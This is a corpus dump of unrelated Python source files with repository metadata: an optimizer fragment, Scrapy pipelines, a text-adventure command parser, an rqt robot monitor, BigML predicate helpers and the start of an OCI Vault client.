xe = (1 + rho * chi) * xbar - rho * chi * sim[-1]
fxe = func(xe)
if fxe < fxr:
sim[-1] = xe
fsim[-1] = fxe
else:
sim[-1] = xr
fsim[-1] = fxr
else: # fsim[0] <= fxr
if fxr < fsim[-2]:
sim[-1] = xr
fsim[-1] = fxr
else: # fxr >= fsim[-2]
# Perform contraction
if fxr < fsim[-1]:
xc = (1 + psi * rho) * xbar - psi * rho * sim[-1]
fxc = func(xc)
if fxc <= fxr:
sim[-1] = xc
fsim[-1] = fxc
else:
doshrink = 1
else:
# Perform an inside contraction
xcc = (1 - psi) * xbar + psi * sim[-1]
fxcc = func(xcc)
if fxcc < fsim[-1]:
sim[-1] = xcc
fsim[-1] = fxcc
else:
doshrink = 1
if doshrink:
for j in one2np1:
sim[j] = sim[0] + sigma * (sim[j] - sim[0])
fsim[j] = func(sim[j])
ind = numpy.argsort(fsim)
sim = numpy.take(sim, ind, 0)
fsim = numpy.take(fsim, ind, 0)
if callback is not None:
callback(sim[0])
iterations += 1
if retall:
allvecs.append(sim[0])
x = sim[0]
fval = numpy.min(fsim)
warnflag = 0
if fcalls[0] >= maxfun:
warnflag = 1
msg = _status_message["maxfev"]
if disp:
print("Warning: " + msg)
elif iterations >= maxiter:
warnflag = 2
msg = _status_message["maxiter"]
if disp:
print("Warning: " + msg)
else:
msg = _status_message["success"]
if disp:
print(msg)
print(" Current function value: %f" % fval)
print(" Iterations: %d" % iterations)
print(" Function evaluations: %d" % fcalls[0])
result = OptimizeResult(
fun=fval,
nit=iterations,
nfev=fcalls[0],
status=warnflag,
success=(warnflag == 0),
message=msg,
x=x,
)
if retall:
result["allvecs"] = allvecs
return result
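# A minimal usage sketch (not part of the original module): minimizing a
# simple quadratic with the relative xtol/ftol options described in the
# docstring above. The objective and starting point are illustrative
# assumptions; the guard keeps importing this module side-effect free.
if __name__ == "__main__":
    def _demo_objective(x):
        # convex bowl with minimum value 3.0 at (1, -2); a nonzero minimum
        # keeps the relative ftol test well defined
        return (x[0] - 1.0) ** 2 + (x[1] + 2.0) ** 2 + 3.0
    res = minimize(
        _demo_objective,
        x0=[0.5, -0.5],
        options={"xtol": 1e-6, "ftol": 1e-6},
    )
    # OptimizeResult is a plain dict subclass here, so use key access
    print(res["x"], res["fun"], res["message"])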
| 26.077869
| 80
| 0.509194
|
eaedfd59190ad288f5447652b18cad9a710941b7
| 161
|
py
|
Python
|
main.py
|
justinhchae/app_courts
|
c46d48c4fa02cec91bda6fc3818ab677d6a83281
|
[
"MIT"
] | 4
|
2021-01-04T05:46:43.000Z
|
2022-01-06T16:33:40.000Z
|
main.py
|
justinhchae/app_courts
|
c46d48c4fa02cec91bda6fc3818ab677d6a83281
|
[
"MIT"
] | null | null | null |
main.py
|
justinhchae/app_courts
|
c46d48c4fa02cec91bda6fc3818ab677d6a83281
|
[
"MIT"
] | null | null | null |
from application.application import Application
if __name__ == '__main__':
app = Application()
def run_app():
app.run_app()
run_app()
| 11.5
| 47
| 0.63354
|
5f3cbf5c9e2b8330b90446a1604db5a6798a758e
| 193
|
py
|
Python
|
python/init/pip_upgrade.py
|
gangserver/py_test
|
869bdfa5c94c3b6a15b87e0c3de6b2cdaca821f4
|
[
"Apache-2.0"
] | null | null | null |
python/init/pip_upgrade.py
|
gangserver/py_test
|
869bdfa5c94c3b6a15b87e0c3de6b2cdaca821f4
|
[
"Apache-2.0"
] | null | null | null |
python/init/pip_upgrade.py
|
gangserver/py_test
|
869bdfa5c94c3b6a15b87e0c3de6b2cdaca821f4
|
[
"Apache-2.0"
] | null | null | null |
import pkg_resources
from subprocess import call
packages = [dist.project_name for dist in pkg_resources.working_set]
call("python -m pip install --upgrade " + ' '.join(packages), shell=True)
| 32.166667
| 73
| 0.772021
|
2080d6d8dba6ac7d40b50201274b7ae825d1ec75
| 2,484
|
py
|
Python
|
invadedhouse/commands/command_interpreter.py
|
redjoey/games
|
c30739e8363a5724f1c80eb3d2ce34e680cee48a
|
[
"MIT"
] | null | null | null |
invadedhouse/commands/command_interpreter.py
|
redjoey/games
|
c30739e8363a5724f1c80eb3d2ce34e680cee48a
|
[
"MIT"
] | 5
|
2019-12-15T19:29:22.000Z
|
2019-12-18T23:02:35.000Z
|
invadedhouse/commands/command_interpreter.py
|
redjoey/games
|
c30739e8363a5724f1c80eb3d2ce34e680cee48a
|
[
"MIT"
] | null | null | null |
from .attack import Attack
from .drop import Drop
from .enter import Enter
from .exit import Exit
from .help import Help
from .inventory import Inventory
from .look import Look
from .lookat import LookAt
from .loot import Loot
from .pickup import Pickup
from .rename import Rename
from .smash import Smash
from .startover import StartOver
from .warp import Warp
from .whereto import WhereTo
from models import House
from models import Player
class CommandInterpreter:
"""
Processes commands input by player at command prompt.
"""
def __init__(self, player: Player, house: House):
self.player = player
self.house = house
help_command = Help('help', player, house)
self.commands = [
Attack('attack', player, house),
Drop('drop', player, house),
Enter('enter', player, house),
Exit('exit', player, house),
help_command,
Inventory('inventory', player, house),
Look('look', player, house),
LookAt('look at', player, house),
Loot('loot', player, house),
Pickup('pickup', player, house),
Rename('change my name', player, house),
Smash('smash', player, house),
StartOver('start over', player, house),
Warp('warp', player, house),
WhereTo('where to', player, house)
]
help_command.set_all_commands(self.commands)
def run(self):
while True:
cmd = self.get_next_command()
self.interpret_command(cmd)
@staticmethod
def get_next_command() -> str:
cmd = input('> ')
return cmd
def interpret_command(self, command_str: str):
command_str = command_str.lower()
words = command_str.split()
matched_command_str = ''
text = ''
matched_command = None
for word in words:
if matched_command:
if len(text) > 0:
text += ' '
text += word
else:
if len(matched_command_str) > 0:
matched_command_str += ' '
matched_command_str += word
for cmd in self.commands:
if cmd.matches(matched_command_str):
matched_command = cmd
if matched_command:
matched_command.do(text)
else:
print('Sorry, I don\'t recognize that command.')
| 29.927711
| 60
| 0.572464
|
47cb52cd64268dd8f391726d47ba89c91e264627
| 1,607
|
py
|
Python
|
scrapy-examples/tutorial/tutorial/pipelines.py
|
Project-Sch/SpiderGarden
|
1928c9253815f79a03f7a6075dbe83add9a170c8
|
[
"Apache-2.0"
] | 2
|
2016-06-11T10:39:25.000Z
|
2017-03-03T04:25:23.000Z
|
scrapy-examples/tutorial/tutorial/pipelines.py
|
Project-Sch/SpiderGarden
|
1928c9253815f79a03f7a6075dbe83add9a170c8
|
[
"Apache-2.0"
] | null | null | null |
scrapy-examples/tutorial/tutorial/pipelines.py
|
Project-Sch/SpiderGarden
|
1928c9253815f79a03f7a6075dbe83add9a170c8
|
[
"Apache-2.0"
] | null | null | null |
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
from scrapy import signals
from scrapy.contrib.exporter import XmlItemExporter
class TutorialPipeline(object):
def process_item(self, item, spider):
for field in item:
            print(field + ': ' + item[field][0])
return item
class XmlExportPipeline(object):
def __init__(self):
self.files = {}
@classmethod
def from_crawler(cls, crawler):
pipeline = cls()
crawler.signals.connect(pipeline.spider_opened, signals.spider_opened)
crawler.signals.connect(pipeline.close_spider, signals.close_spider)
return pipeline
def spider_opened(self, spider):
file = open('%s_products.xml' % spider.name, 'w+b')
self.files[spider] = file
self.exporter = XmlItemExporter(file)
self.exporter.start_exporting()
def close_spider(self, spider):
self.exporter.finish_exporting()
file = self.files.pop(spider)
file.close()
def process_item(self, item, spider):
self.exporter.export_item(item)
return item
import json
import codecs
class JsonWithEncodingPipeline(object):
def __init__(self):
self.file = codecs.open('data_utf8.json', 'w', encoding='utf-8')
def process_item(self, item, spider):
line = json.dumps(dict(item), ensure_ascii=False) + "\n"
self.file.write(line)
return item
def close_spider(self, spider):
self.file.close()
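# The comment at the top of this file points to registering these pipelines in
# the project's settings.py. A minimal sketch of that setting (the priority
# numbers are illustrative assumptions):
#
#     ITEM_PIPELINES = {
#         'tutorial.pipelines.XmlExportPipeline': 300,
#         'tutorial.pipelines.JsonWithEncodingPipeline': 800,
#     }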
| 26.783333
| 78
| 0.664592
|
e73cb0b3dc46495439b7b310ca6e2d0672297c86
| 1,143
|
py
|
Python
|
kde/frameworks/tier3/ktexteditor/ktexteditor.py
|
wrobelda/craft-blueprints-kde
|
366f460cecd5baebdf3a695696767c8c0e5e7c7e
|
[
"BSD-2-Clause"
] | null | null | null |
kde/frameworks/tier3/ktexteditor/ktexteditor.py
|
wrobelda/craft-blueprints-kde
|
366f460cecd5baebdf3a695696767c8c0e5e7c7e
|
[
"BSD-2-Clause"
] | 1
|
2020-01-10T01:06:16.000Z
|
2020-01-10T01:06:16.000Z
|
kde/frameworks/tier3/ktexteditor/ktexteditor.py
|
wrobelda/craft-blueprints-kde
|
366f460cecd5baebdf3a695696767c8c0e5e7c7e
|
[
"BSD-2-Clause"
] | 2
|
2020-01-02T18:22:12.000Z
|
2020-08-05T13:39:21.000Z
|
import info
class subinfo(info.infoclass):
def setTargets(self):
self.versionInfo.setDefaultValues()
self.description = "KTextEditor provides an advanced embeddable text editor"
def setDependencies(self):
self.buildDependencies["virtual/base"] = None
self.buildDependencies["kde/frameworks/extra-cmake-modules"] = None
self.runtimeDependencies["libs/libgit2"] = None
self.runtimeDependencies["kde/frameworks/tier1/karchive"] = None
self.runtimeDependencies["kde/frameworks/tier1/kconfig"] = None
self.runtimeDependencies["kde/frameworks/tier1/kguiaddons"] = None
self.runtimeDependencies["kde/frameworks/tier1/ki18n"] = None
self.runtimeDependencies["kde/frameworks/tier3/kio"] = None
self.runtimeDependencies["kde/frameworks/tier3/kparts"] = None
self.runtimeDependencies["kde/frameworks/tier1/sonnet"] = None
self.runtimeDependencies["kde/frameworks/tier1/syntax-highlighting"] = None
from Package.CMakePackageBase import *
class Package(CMakePackageBase):
def __init__(self):
CMakePackageBase.__init__(self)
| 38.1
| 84
| 0.721785
|
fefa704bd5f9296328de10ab4352c599231ba09d
| 11,871
|
py
|
Python
|
melodic/lib/python2.7/dist-packages/rqt_robot_monitor/robot_monitor.py
|
Dieptranivsr/Ros_Diep
|
d790e75e6f5da916701b11a2fdf3e03b6a47086b
|
[
"MIT"
] | 2
|
2021-07-14T12:33:55.000Z
|
2021-11-21T07:14:13.000Z
|
melodic/src/rqt_robot_monitor/src/rqt_robot_monitor/robot_monitor.py
|
disorn-inc/ROS-melodic-python3-Opencv-4.1.1-CUDA
|
3d265bb64712e3cd7dfa0ad56d78fcdebafdb4b0
|
[
"BSD-3-Clause"
] | 1
|
2021-07-08T10:26:06.000Z
|
2021-07-08T10:31:11.000Z
|
melodic/src/rqt_robot_monitor/src/rqt_robot_monitor/robot_monitor.py
|
disorn-inc/ROS-melodic-python3-Opencv-4.1.1-CUDA
|
3d265bb64712e3cd7dfa0ad56d78fcdebafdb4b0
|
[
"BSD-3-Clause"
] | null | null | null |
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Author: Isaac Saito, Ze'ev Klapow, Austin Hendrix
import os
import rospkg
from diagnostic_msgs.msg import DiagnosticArray, DiagnosticStatus
from python_qt_binding import loadUi
from python_qt_binding.QtCore import QTimer, Signal, Qt, Slot
from python_qt_binding.QtGui import QPalette
from python_qt_binding.QtWidgets import QWidget, QTreeWidgetItem
import rospy
from rqt_robot_monitor.inspector_window import InspectorWindow
from rqt_robot_monitor.status_item import StatusItem
from rqt_robot_monitor.timeline_pane import TimelinePane
from rqt_robot_monitor.timeline import Timeline
import rqt_robot_monitor.util_robot_monitor as util
class RobotMonitorWidget(QWidget):
"""
    NOTE: The RobotMonitorWidget.shutdown function needs to be called
when the instance of this class terminates.
RobotMonitorWidget itself doesn't store previous diagnostic states.
It instead delegates that function to Timeline class.
"""
_TREE_ALL = 1
_TREE_WARN = 2
_TREE_ERR = 3
_message_updated = Signal(dict)
_queue_updated = Signal()
def __init__(self, context, topic=None):
"""
:param context: plugin context hook to enable adding widgets as a
ROS_GUI pane, 'PluginContext'
:param topic: Diagnostic topic to subscribe to 'str'
"""
super(RobotMonitorWidget, self).__init__()
rp = rospkg.RosPack()
ui_file = os.path.join(rp.get_path('rqt_robot_monitor'), 'resource',
'robotmonitor_mainwidget.ui')
loadUi(ui_file, self)
obj_name = 'Robot Monitor'
self.setObjectName(obj_name)
self.setWindowTitle(obj_name)
self._message_updated_processing = False
self._queue_updated_processing = False
# if we're given a topic, create a timeline. otherwise, don't
# this can be used later when writing an rqt_bag plugin
if topic:
# create timeline data structure
self._timeline = Timeline(topic, DiagnosticArray)
self._timeline.message_updated.connect(
self.message_updated, Qt.DirectConnection)
self._timeline.queue_updated.connect(
self.queue_updated, Qt.DirectConnection)
self._message_updated.connect(
self._signal_message_updated, Qt.QueuedConnection)
self._queue_updated.connect(
self._signal_queue_updated, Qt.QueuedConnection)
# create timeline pane widget
self._timeline_pane = TimelinePane(self, self._timeline.paused)
self._timeline_pane.pause_changed.connect(self._timeline.set_paused)
self._timeline_pane.position_changed.connect(self._timeline.set_position)
self._timeline.pause_changed.connect(self._timeline_pane.set_paused)
self._timeline.position_changed.connect(self._timeline_pane.set_position)
self.vlayout_top.addWidget(self._timeline_pane)
self._timeline_pane.show()
else:
self._timeline = None
self._timeline_pane = None
self._inspectors = {}
self.tree_all_devices.itemDoubleClicked.connect(self._tree_clicked)
self.warn_flattree.itemDoubleClicked.connect(self._tree_clicked)
self.err_flattree.itemDoubleClicked.connect(self._tree_clicked)
# TODO: resize on itemCollapsed and itemExpanded
self._is_stale = False
self._timer = QTimer()
self._timer.timeout.connect(self._update_message_state)
self._timer.start(1000)
palette = self.tree_all_devices.palette()
self._original_base_color = palette.base().color()
self._original_alt_base_color = palette.alternateBase().color()
self._tree = StatusItem(self.tree_all_devices.invisibleRootItem())
self._warn_tree = StatusItem(self.warn_flattree.invisibleRootItem())
self._err_tree = StatusItem(self.err_flattree.invisibleRootItem())
@Slot(dict)
def message_updated(self, status):
'''
        This method just calls _signal_message_updated in a 'best effort' manner.
This method should be called by signal with DirectConnection.
'''
if self._message_updated_processing:
return
self._message_updated_processing = True
self._message_updated.emit(status)
@Slot(dict)
def _signal_message_updated(self, status):
""" DiagnosticArray message callback """
# Walk the status array and update the tree
for name, status in status.items():
# Compute path and walk to appropriate subtree
path = name.split('/')
if path[0] == '':
path = path[1:]
tmp_tree = self._tree
for p in path:
tmp_tree = tmp_tree[p]
tmp_tree.update(status, util.get_resource_name(name))
# Check for warnings
if status.level == DiagnosticStatus.WARN:
self._warn_tree[name].update(status, name)
# Check for errors
if (status.level == DiagnosticStatus.ERROR or
status.level == DiagnosticStatus.STALE):
self._err_tree[name].update(status, name)
# For any items in the tree that were not updated, remove them
self._tree.prune()
self._warn_tree.prune()
self._err_tree.prune()
# TODO(ahendrix): implement
# Insight: for any item that is not OK, it only provides additional
# information if all of it's children are OK
#
# otherwise, it's just an aggregation of its children
# and doesn't provide any additional value when added to
# the warning and error flat trees
self.tree_all_devices.resizeColumnToContents(0)
self.warn_flattree.resizeColumnToContents(0)
self.err_flattree.resizeColumnToContents(0)
self._message_updated_processing = False
@Slot()
def queue_updated(self):
'''
        This method just calls _signal_queue_updated in a 'best effort' manner.
This method should be called by signal with DirectConnection.
'''
if self._queue_updated_processing:
return
self._queue_updated_processing = True
self._queue_updated.emit()
@Slot()
def _signal_queue_updated(self):
# update timeline pane
# collect worst status levels for each history
        levels = [max(status.level for status in history.values()) for history in self._timeline]
self._timeline_pane.set_levels(levels)
self._timeline_pane.redraw.emit()
self._queue_updated_processing = False
def resizeEvent(self, evt):
"""Overridden from QWidget"""
rospy.logdebug('RobotMonitorWidget resizeEvent')
if self._timeline_pane:
self._timeline_pane.redraw.emit()
@Slot(str)
def _inspector_closed(self, name):
""" Called when an inspector window is closed """
if name in self._inspectors:
del self._inspectors[name]
@Slot(QTreeWidgetItem, int)
def _tree_clicked(self, item, column):
"""
Slot to QTreeWidget.itemDoubleClicked
:type item: QTreeWidgetItem
:type column: int
"""
rospy.logdebug('RobotMonitorWidget _tree_clicked col=%d', column)
if item.name in self._inspectors:
self._inspectors[item.name].activateWindow()
else:
insp = InspectorWindow(None, item.name, self._timeline)
insp.show()
insp.closed.connect(self._inspector_closed)
self._inspectors[item.name] = insp
def _update_message_state(self):
""" Update the display if it's stale """
if self._timeline is not None:
if self._timeline.has_messages:
previous_stale_state = self._is_stale
self._is_stale = self._timeline.is_stale
time_diff = int(self._timeline.data_age)
msg_template = "Last message received %s %s ago"
if time_diff == 1:
msg = msg_template % (time_diff, "second")
else:
msg = msg_template % (time_diff, "seconds")
self._timeline_pane._msg_label.setText(msg)
if previous_stale_state != self._is_stale:
self._update_background_color()
else:
# no messages received yet
self._timeline_pane._msg_label.setText("No messages received")
def _update_background_color(self):
""" Update the background color based on staleness """
p = self.tree_all_devices.palette()
if self._is_stale:
p.setColor(QPalette.Base, Qt.darkGray)
p.setColor(QPalette.AlternateBase, Qt.lightGray)
else:
p.setColor(QPalette.Base, self._original_base_color)
p.setColor(QPalette.AlternateBase, self._original_alt_base_color)
self.tree_all_devices.setPalette(p)
self.warn_flattree.setPalette(p)
self.err_flattree.setPalette(p)
def shutdown(self):
"""
This needs to be called whenever this class terminates.
This closes all the instances on all trees.
Also unregisters ROS' subscriber, stops timer.
"""
rospy.logdebug('RobotMonitorWidget in shutdown')
names = self._inspectors.keys()
for name in names:
self._inspectors[name].close()
if self._timeline:
self._timeline.shutdown()
self._timer.stop()
del self._timer
def save_settings(self, plugin_settings, instance_settings):
instance_settings.set_value('splitter', self.splitter.saveState())
# TODO(ahendrix): persist the device paths, positions and sizes of any
# inspector windows
def restore_settings(self, plugin_settings, instance_settings):
if instance_settings.contains('splitter'):
self.splitter.restoreState(instance_settings.value('splitter'))
else:
self.splitter.setSizes([100, 100, 200])
# TODO(ahendrix): restore inspector windows
| 39.178218
| 85
| 0.665235
|
bc9c6956aab6c288dc419b3ee372744a4c5e47b6
| 10,150
|
py
|
Python
|
bigml/predicate_utils/utils.py
|
axellos162/python-4
|
569f6655871ea60b41e9442396433567b9daaea7
|
[
"Apache-2.0"
] | 137
|
2015-01-12T06:04:10.000Z
|
2022-03-06T21:00:04.000Z
|
bigml/predicate_utils/utils.py
|
axellos162/python-4
|
569f6655871ea60b41e9442396433567b9daaea7
|
[
"Apache-2.0"
] | 78
|
2015-01-13T18:28:51.000Z
|
2022-03-04T19:18:28.000Z
|
bigml/predicate_utils/utils.py
|
axellos162/python-4
|
569f6655871ea60b41e9442396433567b9daaea7
|
[
"Apache-2.0"
] | 144
|
2015-01-16T06:13:33.000Z
|
2022-03-29T17:53:16.000Z
|
# -*- coding: utf-8 -*-
#
# Copyright 2020-2021 BigML
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Common auxiliary functions to be used in the node predicate evaluation
"""
import operator
import re
from bigml.util import plural
# Operator Codes
LT = 0
LE = 1
EQ = 2
NE = 3
GE = 4
GT = 5
IN = 6
# Map operator string to its corresponding code
OPERATOR_CODE = {"<": LT,
"<=": LE,
"=": EQ,
"!=": NE,
"/=": NE,
">=": GE,
">": GT,
"in": IN}
# Map operator code to its corresponding function
OPERATOR = [operator.lt,
operator.le,
operator.eq,
operator.ne,
operator.ge,
operator.gt,
operator.contains]
INVERSE_OP = dict(zip(OPERATOR_CODE.values(), OPERATOR_CODE.keys()))
RELATIONS = {
'<=': 'no more than %s %s',
'>=': '%s %s at most',
'>': 'more than %s %s',
'<': 'less than %s %s'
}
TM_TOKENS = 'tokens_only'
TM_FULL_TERM = 'full_terms_only'
TM_ALL = 'all'
FULL_TERM_PATTERN = re.compile(r'^.+\b.+$', re.U)
OPERATION_OFFSET = 2
FIELD_OFFSET = 3
VALUE_OFFSET = 4
TERM_OFFSET = 5
MISSING_OFFSET = 6
PREDICATE_INFO_LENGTH = 5
def term_matches(text, forms_list, options):
""" Counts the number of occurences of the words in forms_list in the text
The terms in forms_list can either be tokens or full terms. The
matching for tokens is contains and for full terms is equals.
"""
token_mode = options.get('token_mode', TM_TOKENS)
case_sensitive = options.get('case_sensitive', False)
first_term = forms_list[0]
if token_mode == TM_FULL_TERM:
return full_term_match(text, first_term, case_sensitive)
return term_matches_tokens(text, forms_list, case_sensitive)
def is_full_term(term, field):
"""Returns a boolean showing if a term is considered as a full_term
"""
if term is not None:
# new optype has to be handled in tokens
if field['optype'] == 'items':
return False
options = field['term_analysis']
token_mode = options.get('token_mode', TM_TOKENS)
if token_mode == TM_FULL_TERM:
return True
if token_mode == TM_ALL:
return re.match(FULL_TERM_PATTERN, term)
return False
def full_term_match(text, full_term, case_sensitive):
"""Counts the match for full terms according to the case_sensitive option
"""
if not case_sensitive:
text = text.lower()
full_term = full_term.lower()
return 1 if text == full_term else 0
def get_tokens_flags(case_sensitive):
"""Returns flags for regular expression matching depending on text analysis
options
"""
flags = re.U
if not case_sensitive:
flags = (re.I | flags)
return flags
def term_matches_tokens(text, forms_list, case_sensitive):
"""Counts the number of occurences of the words in forms_list in the text
"""
flags = get_tokens_flags(case_sensitive)
expression = r'(\b|_)%s(\b|_)' % '(\\b|_)|(\\b|_)'.join([re.escape(term) \
for term in forms_list])
pattern = re.compile(expression, flags=flags)
matches = re.findall(pattern, text)
return len(matches)
def item_matches(text, item, options):
""" Counts the number of occurences of the item in the text
The matching considers the separator or
the separating regular expression.
"""
separator = options.get('separator', ' ')
regexp = options.get('separator_regexp')
if regexp is None:
regexp = r"%s" % re.escape(separator)
return count_items_matches(text, item, regexp)
def count_items_matches(text, item, regexp):
""" Counts the number of occurences of the item in the text
"""
expression = r'(^|%s)%s($|%s)' % (regexp, re.escape(item), regexp)
pattern = re.compile(expression, flags=re.U)
matches = re.findall(pattern, text)
return len(matches)
def apply_predicates(node, input_data, fields, normalize_repeats=False):
shift = 1 if normalize_repeats else 0
num_predicates = node[1 + shift]
predicates_ok = 0
for i in range(num_predicates):
operation = node[OPERATION_OFFSET + (PREDICATE_INFO_LENGTH * i) + shift]
field = node[FIELD_OFFSET + (PREDICATE_INFO_LENGTH * i) + shift]
value = node[VALUE_OFFSET + (PREDICATE_INFO_LENGTH * i) + shift]
term = node[TERM_OFFSET + (PREDICATE_INFO_LENGTH * i) + shift]
missing = node[MISSING_OFFSET + (PREDICATE_INFO_LENGTH * i) + shift]
predicate_ok = apply_predicate(operation, field, value, term, missing,
input_data, fields[field])
if predicate_ok:
predicates_ok += 1
return predicates_ok
def apply_predicate(operation, field, value, term, missing, input_data,
field_info):
"""Applies the operators defined in the predicate as strings to
the provided input data
"""
# for missing operators
if input_data.get(field) is None:
# text and item fields will treat missing values by following the
# doesn't contain branch
if term is None:
return missing or (
operation == EQ and value is None)
elif operation == NE and value is None:
return True
if term is not None:
if field_info['optype'] == 'text':
all_forms = field_info['summary'].get('term_forms', {})
term_forms = all_forms.get(term, [])
terms = [term]
terms.extend(term_forms)
options = field_info['term_analysis']
input_terms = term_matches(input_data.get(field, ""), terms,
options)
return OPERATOR[operation](input_terms, value)
# new items optype
options = field_info['item_analysis']
input_items = item_matches(input_data.get(field, ""), term,
options)
return OPERATOR[operation](input_items, value)
if operation == IN:
return OPERATOR[operation](value, input_data[field])
return OPERATOR[operation](input_data[field], value)
def pack_predicate(predicate):
"""Compacts the predicate condition
"""
node = list()
if predicate and predicate is not True:
operation = predicate.get('operator')
value = predicate.get('value')
missing = False
if operation.endswith("*"):
operation = operation[0: -1]
missing = True
elif operation == 'in' and None in value:
missing = True
node.append(OPERATOR_CODE.get(operation))
node.append(predicate.get('field'))
node.append(value)
node.append(predicate.get('term'))
node.append(missing)
else:
node.append(True)
return node
def predicate_to_rule(operation, field_info, value, term,
missing, label='name'):
"""Predicate condition string
"""
# externally forcing missing to True or False depending on the path
if missing is None:
missing = False
if label is not None:
name = field_info[label]
else:
name = ""
operation = INVERSE_OP[operation]
full_term = is_full_term(term, field_info)
relation_missing = " or missing" if missing else ""
if term is not None:
relation_suffix = ''
if ((operation == '<' and value <= 1) or
(operation == '<=' and value == 0)):
relation_literal = ('is not equal to' if full_term
else 'does not contain')
else:
relation_literal = 'is equal to' if full_term else 'contains'
if not full_term:
if operation != '>' or value != 0:
relation_suffix = (RELATIONS[operation] %
(value,
plural('time', value)))
return "%s %s %s %s%s" % (name, relation_literal,
term, relation_suffix,
relation_missing)
if value is None:
return "%s %s" % (name,
"is missing" if operation == '='
else "is not missing")
return "%s %s %s%s" % (name,
operation,
value,
relation_missing)
def to_lisp_rule(operation, field, value, term,
missing, field_info):
"""Builds rule string in LISP from a predicate
"""
if term is not None:
if field_info['optype'] == 'text':
options = field_info['term_analysis']
case_insensitive = not options.get('case_sensitive', False)
case_insensitive = 'true' if case_insensitive else 'false'
language = options.get('language')
language = "" if language is None else " %s" % language
return "(%s (occurrences (f %s) %s %s%s) %s)" % (
operation, field, term,
case_insensitive, language, value)
if field_info['optype'] == 'items':
return "(%s (if (contains-items? %s %s) 1 0) %s)" % (
operation, field, term, value)
if value is None:
negation = "" if operation == "=" else "not "
return "(%s missing? %s)" % (negation, field)
rule = "(%s (f %s) %s)" % (operation,
field,
value)
if missing:
rule = "(or (missing? %s) %s)" % (field, rule)
return rule
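# A minimal usage sketch (illustrative field ids and values, not BigML API
# output) showing how the helpers above combine: a token-mode text predicate
# and a plain numeric comparison, both evaluated against a small input row.
if __name__ == "__main__":
    text_field_info = {
        "name": "review",
        "optype": "text",
        "summary": {"term_forms": {}},
        "term_analysis": {"token_mode": TM_TOKENS, "case_sensitive": False},
    }
    # "good" occurs twice as a token, so "occurrences >= 2" holds -> True
    print(apply_predicate(GE, "000001", 2, "good", False,
                          {"000001": "good food, good mood"}, text_field_info))
    # plain numeric comparison: 5 > 3 -> True
    print(apply_predicate(GT, "000002", 3, None, False,
                          {"000002": 5}, {"name": "age", "optype": "numeric"}))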
| 33.061889
| 80
| 0.591034
|
957fc248015ace0a7f263e6ab741f7bd28519c20
| 1,717
|
py
|
Python
|
visualiser/facades/ociVault.py
|
LaudateCorpus1/oci-designer-toolkit
|
4b6af0d8088ea3f3b61cb3b6076a1382c269d8b4
|
[
"UPL-1.0",
"Apache-2.0"
] | 186
|
2020-05-12T23:02:38.000Z
|
2022-03-25T04:29:25.000Z
|
visualiser/facades/ociVault.py
|
LaudateCorpus1/oci-designer-toolkit
|
4b6af0d8088ea3f3b61cb3b6076a1382c269d8b4
|
[
"UPL-1.0",
"Apache-2.0"
] | 145
|
2020-05-13T17:40:00.000Z
|
2022-03-22T17:27:11.000Z
|
visualiser/facades/ociVault.py
|
LaudateCorpus1/oci-designer-toolkit
|
4b6af0d8088ea3f3b61cb3b6076a1382c269d8b4
|
[
"UPL-1.0",
"Apache-2.0"
] | 96
|
2020-05-13T16:00:08.000Z
|
2022-03-25T06:22:12.000Z
|
#!/usr/bin/python
# Copyright (c) 2020, 2021, Oracle and/or its affiliates.
# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl.
"""Provide Module Description
"""
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
__author__ = ["Andrew Hopkinson (Oracle Cloud Solutions A-Team)"]
__version__ = "1.0.0"
__module__ = "ociVault"
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
import oci
from common.okitLogging import getLogger
from facades.ociConnection import OCIVaultConnection
# Configure logging
logger = getLogger()
class OCIVaults(OCIVaultConnection):
def __init__(self, config=None, configfile=None, profile=None, compartment_id=None):
self.compartment_id = compartment_id
self.vaults_json = []
super(OCIVaults, self).__init__(config=config, configfile=configfile, profile=profile)
def list(self, compartment_id=None, filter=None):
if compartment_id is None:
compartment_id = self.compartment_id
        # Add filter to only return AVAILABLE vaults
if filter is None:
filter = {}
if 'lifecycle_state' not in filter:
filter['lifecycle_state'] = 'AVAILABLE'
